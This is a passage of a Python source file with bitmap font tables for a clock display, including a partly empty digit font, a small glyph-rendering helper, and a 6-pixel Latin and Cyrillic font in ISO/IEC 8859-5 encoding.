[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'i'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'j'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'k'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'l'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'm'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'n'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'o'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'p'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'r'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 's'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 't'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'u'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'v'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'w'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'x'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '{'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '|'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '}'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '~'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x7F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x80 p
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x81 c
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x82 т
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x83 у
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x84 ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x85 x
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x86 ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x87 ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x88 ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x89 щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8A ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8B ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8C ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8D э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8E ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8F я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x90 A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x91 Б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x92 В
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x93 Г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x94 Д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x95 E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x96 Ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x97 З
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x98 И
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x99 Й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9A K
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9B Л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9C M
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9D H
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9E O
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9F П
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA0 P
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA1 C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA2 T
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA3 У
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA4 Ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA5 X
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA6 Ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA7 Ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA8 Ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA9 Щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAA Ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAB Ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAC Э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAD Ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAE Ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAF Я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB0 a
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB1 б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB2 в
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB3 г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB4 д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB5 e
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB6 ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB7 з
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB8 и
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB9 й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBA к
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBB л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBC м
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBD н
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBE o
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBF п
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xED
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFF
]
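# Illustrative sketch (not part of the original data): one plausible way to
# rasterize a glyph from the 10-pixel-high digit fonts above.  Assumptions, not
# confirmed by this module: each glyph entry holds 8 column words, bit 0 of a
# word is the top pixel row, bit 9 the bottom one, and a set bit means "pixel on".
def _render_digit_glyph(font, char, height=10):
    """Return the glyph for *char* as a list of text rows ('#' = on, '.' = off)."""
    columns = font[ord(char)]
    return [
        "".join("#" if (col >> row) & 1 else "." for col in columns)
        for row in range(height)
    ]

# Example (assumed usage): compare the slim and 7-segment style '8'.
# for line in _render_digit_glyph(DIGITS_FONT_SLIM, "8"):
#     print(line)
# for line in _render_digit_glyph(DIGITS_FONT_SEG, "8"):
#     print(line)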
#: Bit patterns for the pilotClock Date Out, ISO/IEC 8859-5 encoding, font height = 6
DATE_OUT_FONT = [
[0x00, 0x00, 0x00, 0x00], # 0x00
[0x00, 0x00, 0x00, 0x00], # 0x01
[0x00, 0x00, 0x00, 0x00], # 0x02
[0x00, 0x00, 0x00, 0x00], # 0x03
[0x00, 0x00, 0x00, 0x00], # 0x04
[0x00, 0x00, 0x00, 0x00], # 0x05
[0x00, 0x00, 0x00, 0x00], # 0x06
[0x00, 0x00, 0x00, 0x00], # 0x07
[0x00, 0x00, 0x00, 0x00], # 0x08
[0x00, 0x00, 0x00, 0x00], # 0x09
[0x00, 0x00, 0x00, 0x00], # 0x0A
[0x00, 0x00, 0x00, 0x00], # 0x0B
[0x00, 0x00, 0x00, 0x00], # 0x0C
[0x00, 0x00, 0x00, 0x00], # 0x0D
[0x00, 0x00, 0x00, 0x00], # 0x0E
[0x00, 0x00, 0x00, 0x00], # 0x0F
[0x00, 0x00, 0x00, 0x00], # 0x10
[0x00, 0x00, 0x00, 0x00], # 0x11
[0x00, 0x00, 0x00, 0x00], # 0x12
[0x00, 0x00, 0x00, 0x00], # 0x13
[0x00, 0x00, 0x00, 0x00], # 0x14
[0x00, 0x00, 0x00, 0x00], # 0x15
[0x00, 0x00, 0x00, 0x00], # 0x16
[0x00, 0x00, 0x00, 0x00], # 0x17
[0x00, 0x00, 0x00, 0x00], # 0x18
[0x00, 0x00, 0x00, 0x00], # 0x19
[0x00, 0x00, 0x00, 0x00], # 0x1A
[0x00, 0x00, 0x00, 0x00], # 0x1B
[0x00, 0x00, 0x00, 0x00], # 0x1C
[0x00, 0x00, 0x00, 0x00], # 0x1D
[0x00, 0x00, 0x00, 0x00], # 0x1E
[0x00, 0x00, 0x00, 0x00], # 0x1F
[0x00, 0x00], # 0x20 ' '
[0x17, 0x00], # 0x21 '!'
[0x03, 0x03, 0x00], # 0x22 '"'
[0x0A, 0x1F, 0x0A, 0x1F, 0x0A, 0x00], # 0x23 '#'
[0x16, 0x37, 0x1A, 0x00], # 0x24 '$'
[0x19, 0x04, 0x13, 0x00], # 0x25 '%'
[0x1B, 0x17, 0x18, 0x14, 0x00], # 0x26 '&'
[0x03, 0x00], # 0x27 '''
[0x0E, 0x11, 0x00], # 0x28 '('
[0x11, 0x0E, 0x00], # 0x29 ')'
[0x14, 0x08, 0x14, 0x00], # 0x2A '*'
[0x08, 0x1C, 0x08, 0x00], # 0x2B '+'
[0x20, 0x10, 0x00], # 0x2C ','
[0x04, 0x04, 0x00], # 0x2D '-'
[0x10, 0x00], # 0x2E '.'
[0x18, 0x04, 0x03, 0x00], # 0x2F '/'
[0x1F, 0x11, 0x1F, 0x00], # 0x30 '0'
[0x11, 0x1F, 0x10, 0x00], # 0x31 '1'
[0x1D, 0x15, 0x17, 0x00], # 0x32 '2'
[0x15, 0x15, 0x1F, 0x00], # 0x33 '3'
[0x07, 0x04, 0x1F, 0x00], # 0x34 '4'
[0x17, 0x15, 0x1D, 0x00], # 0x35 '5'
[0x1F, 0x15, 0x1D, 0x00], # 0x36 '6'
[0x01, 0x01, 0x1F, 0x00], # 0x37 '7'
[0x1F, 0x15, 0x1F, 0x00], # 0x38 '8'
[0x17, 0x15, 0x1F, 0x00], # 0x39 '9'
[0x12, 0x00], # 0x3A ':'
[0x20, 0x12, 0x00], # 0x3B ';'
[0x04, 0x0A, 0x11, 0x00], # 0x3C '<'
[0x0A, 0x0A, 0x00], # 0x3D '='
[0x11, 0x0A, 0x04, 0x00], # 0x3E '>'
[0x01, 0x15, 0x03, 0x00], # 0x3F '?'
[0x0E, 0x11, 0x15, 0x17], # 0x40 '@'
[0x1F, 0x05, 0x1F, 0x00], # 0x41 'A'
[0x1F, 0x15, 0x1B, 0x00], # 0x42 'B'
[0x1F, 0x11, 0x11, 0x00], # 0x43 'C'
[0x1F, 0x11, 0x0E, 0x00], # 0x44 'D'
[0x1F, 0x15, 0x15, 0x00], # 0x45 'E'
[0x1F, 0x05, 0x05, 0x00], # 0x46 'F'
[0x1F, 0x11, 0x1D, 0x00], # 0x47 'G'
[0x1F, 0x04, 0x1F, 0x00], # 0x48 'H'
[0x1F, 0x00], # 0x49 'I'
[0x18, 0x10, 0x1F, 0x00], # 0x4A 'J'
[0x1F, 0x04, 0x1B, 0x00], # 0x4B 'K'
[0x1F, 0x10, 0x10, 0x00], # 0x4C 'L'
[0x1F, 0x01, 0x1E, 0x01, 0x1F, 0x00], # 0x4D 'M'
[0x1F, 0x01, 0x1E, 0x00], # 0x4E 'N'
[0x1F, 0x11, 0x1F, 0x00], # 0x4F 'O'
[0x1F, 0x05, 0x07, 0x00], # 0x50 'P'
[0x1F, 0x11, 0x1F, 0x20, 0x00], # 0x51 'Q'
[0x1F, 0x05, 0x1B, 0x00], # 0x52 'R'
[0x17, 0x15, 0x1D, 0x00], # 0x53 'S'
[0x01, 0x1F, 0x01, 0x00], # 0x54 'T'
[0x1F, 0x10, 0x1F, 0x00], # 0x55 'U'
[0x0F, 0x10, 0x0F, 0x00], # 0x56 'V'
[0x1F, 0x10, 0x0F, 0x10, 0x1F, 0x00], # 0x57 'W'
[0x1B, 0x04, 0x1B, 0x00], # 0x58 'X'
[0x03, 0x1C, 0x03, 0x00], # 0x59 'Y'
[0x19, 0x15, 0x13, 0x00], # 0x5A 'Z'
[0x1F, 0x11, 0x00], # 0x5B '['
[0x03, 0x04, 0x18, 0x00], # 0x5C '\'
[0x11, 0x1F, 0x00], # 0x5D ']'
[0x02, 0x01, 0x02, 0x00], # 0x5E '^'
[0x10, 0x10, 0x10, 0x00], # 0x5F '_'
[0x01, 0x02, 0x00], # 0x60 '`'
[0x1F, 0x05, 0x1F, 0x00], # 0x61 'a'
[0x1F, 0x15, 0x1B, 0x00], # 0x62 'b'
[0x1F, 0x11, 0x11, 0x00], # 0x63 'c'
[0x1F, 0x11, 0x0E, 0x00], # 0x64 'd'
[0x1F, 0x15, 0x15, 0x00], # 0x65 'e'
[0x1F, 0x05, 0x05, 0x00], # 0x66 'f'
[0x1F, 0x11, 0x1D, 0x00], # 0x67 'g'
[0x1F, 0x04, 0x1F, 0x00], # 0x68 'h'
[0x1F, 0x00], # 0x69 'i'
[0x18, 0x10, 0x1F, 0x00], # 0x6A 'j'
[0x1F, 0x04, 0x1B, 0x00], # 0x6B 'k'
[0x1F, 0x10, 0x10, 0x00], # 0x6C 'l'
[0x1F, 0x01, 0x1E, 0x01, 0x1F, 0x00], # 0x6D 'm'
[0x1F, 0x01, 0x1E, 0x00], # 0x6E 'n'
[0x1F, 0x11, 0x1F, 0x00], # 0x6F 'o'
[0x1F, 0x05, 0x07, 0x00], # 0x70 'p'
[0x1F, 0x11, 0x1F, 0x20, 0x00], # 0x71 'q'
[0x1F, 0x05, 0x1B, 0x00], # 0x72 'r'
[0x17, 0x15, 0x1D, 0x00], # 0x73 's'
[0x01, 0x1F, 0x01, 0x00], # 0x74 't'
[0x1F, 0x10, 0x1F, 0x00], # 0x75 'u'
[0x0F, 0x10, 0x0F, 0x00], # 0x76 'v'
[0x1F, 0x10, 0x0F, 0x10, 0x1F, 0x00], # 0x77 'w'
[0x1B, 0x04, 0x1B, 0x00], # 0x78 'x'
[0x03, 0x1C, 0x03, 0x00], # 0x79 'y'
[0x19, 0x15, 0x13, 0x00], # 0x7A 'z'
[0x04, 0x1B, 0x11, 0x00], # 0x7B '{'
[0x1F, 0x00], # 0x7C '|'
[0x11, 0x1B, 0x04, 0x00], # 0x7D '}'
[0x02, 0x01, 0x02, 0x01, 0x00], # 0x7E '~'
[0x00, 0x00, 0x00, 0x00], # 0x7F
[0x00, 0x00, 0x00, 0x00], # 0x80
[0x00, 0x00, 0x00, 0x00], # 0x81
[0x00, 0x00, 0x00, 0x00], # 0x82
[0x00, 0x00, 0x00, 0x00], # 0x83
[0x00, 0x00, 0x00, 0x00], # 0x84
[0x00, 0x00, 0x00, 0x00], # 0x85
[0x00, 0x00, 0x00, 0x00], # 0x86
[0x00, 0x00, 0x00, 0x00], # 0x87
[0x00, 0x00, 0x00, 0x00], # 0x88
[0x00, 0x00, 0x00, 0x00], # 0x89
[0x00, 0x00, 0x00, 0x00], # 0x8A
[0x00, 0x00, 0x00, 0x00], # 0x8B
[0x00, 0x00, 0x00, 0x00], # 0x8C
[0x00, 0x00, 0x00, 0x00], # 0x8D
[0x00, 0x00, 0x00, 0x00], # 0x8E
[0x00, 0x00, 0x00, 0x00], # 0x8F
[0x00, 0x00, 0x00, 0x00], # 0x90
[0x00, 0x00, 0x00, 0x00], # 0x91
[0x00, 0x00, 0x00, 0x00], # 0x92
[0x00, 0x00, 0x00, 0x00], # 0x93
[0x00, 0x00, 0x00, 0x00], # 0x94
[0x00, 0x00, 0x00, 0x00], # 0x95
[0x00, 0x00, 0x00, 0x00], # 0x96
[0x00, 0x00, 0x00, 0x00], # 0x97
[0x00, 0x00, 0x00, 0x00], # 0x98
[0x00, 0x00, 0x00, 0x00], # 0x99
[0x00, 0x00, 0x00, 0x00], # 0x9A
[0x00, 0x00, 0x00, 0x00], # 0x9B
[0x00, 0x00, 0x00, 0x00], # 0x9C
[0x00, 0x00, 0x00, 0x00], # 0x9D
[0x00, 0x00, 0x00, 0x00], # 0x9E
[0x00, 0x00, 0x00, 0x00], # 0x9F
[0x00, 0x00, 0x00, 0x00], # 0xA0 NBSP
[0x1F, 0x15, 0x15, 0x00], # 0xA1 'Ё'
[0x00, 0x00, 0x00, 0x00], # 0xA2 'Ђ'
[0x00, 0x00, 0x00, 0x00], # 0xA3 'Ѓ'
[0x0E, 0x15, 0x11, 0x00], # 0xA4 'Є'
[0x00, 0x00, 0x00, 0x00], # 0xA5 'Ѕ'
[0x00, 0x00, 0x00, 0x00], # 0xA6 'І'
[0x01, 0x1E, 0x01, 0x00], # 0xA7 'Ї'
[0x00, 0x00, 0x00, 0x00], # 0xA8 'Ј'
[0x00, 0x00, 0x00, 0x00], # 0xA9 'Љ'
[0x00, 0x00, 0x00, 0x00], # 0xAA 'Њ'
[0x00, 0x00, 0x00, 0x00], # 0xAB 'Ћ'
[0x00, 0x00, 0x00, 0x00], # 0xAC 'Ќ'
[0x00, 0x00, 0x00, 0x00], # 0xAD SHY
[0x00, 0x00, 0x00, 0x00], # 0xAE 'Ў'
[0x00, 0x00, 0x00, 0x00], # 0xAF 'Џ'
[0x1F, 0x05, 0x1F, 0x00], # 0xB0 'А'
[0x1F, 0x15, 0x19, 0x00], # 0xB1 'Б'
[0x1F, 0x15, 0x1B, 0x00], # 0xB2 'В'
[0x1F, 0x01, 0x01, 0x00], # 0xB3 'Г'
[0x30, 0x1F, 0x11, 0x1F, 0x30, 0x00], # 0xB4 'Д'
[0x1F, 0x15, 0x15, 0x00], # 0xB5 'Е'
[0x1B, 0x04, 0x1F, 0x04, 0x1B, 0x00], # 0xB6 'Ж'
[0x15, 0x15, 0x1B, 0x00], # 0xB7 'З'
[0x0F, 0x10, 0x1F, 0x00], # 0xB8 'И'
[0x0F, 0x10, 0x1F, 0x00], # 0xB9 'Й'
[0x1F, 0x04, 0x1B, 0x00], # 0xBA 'К'
[0x1E, 0x01, 0x1F, 0x00], # 0xBB 'Л'
[0x1F, 0x01, 0x1E, 0x01, 0x1F, 0x00], # 0xBC 'М'
[0x1F, 0x04, 0x1F, 0x00], # 0xBD 'Н'
[0x1F, 0x11, 0x1F, 0x00], # 0xBE 'О'
[0x1F, 0x01, 0x1F, 0x00], # 0xBF 'П'
[0x1F, 0x05, 0x07, 0x00], # 0xC0 'Р'
[0x1F, 0x11, 0x11, 0x00], # 0xC1 'С'
[0x01, 0x1F, 0x01, 0x00], # 0xC2 'Т'
[0x17, 0x14, 0x1F, 0x00], # 0xC3 'У'
[0x07, 0x05, 0x1F, 0x05, 0x07, 0x00], # 0xC4 'Ф'
[0x1B, 0x04, 0x1B, 0x00], # 0xC5 'Х'
[0x1F, 0x10, 0x1F, 0x30, 0x00], # 0xC6 'Ц'
[0x07, 0x04, 0x1F, 0x00], # 0xC7 'Ч'
[0x1F, 0x10, 0x1F, 0x10, 0x1F, 0x00], # 0xC8 'Ш'
[0x1F, 0x10, 0x1F, 0x10, 0x1F, 0x30, 0x00], # 0xC9 'Щ'
[0x01, 0x1F, 0x14, 0x1C, 0x00], # 0xCA 'Ъ'
[0x1F, 0x14, 0x1C, 0x00, 0x1F, 0x00], # 0xCB 'Ы'
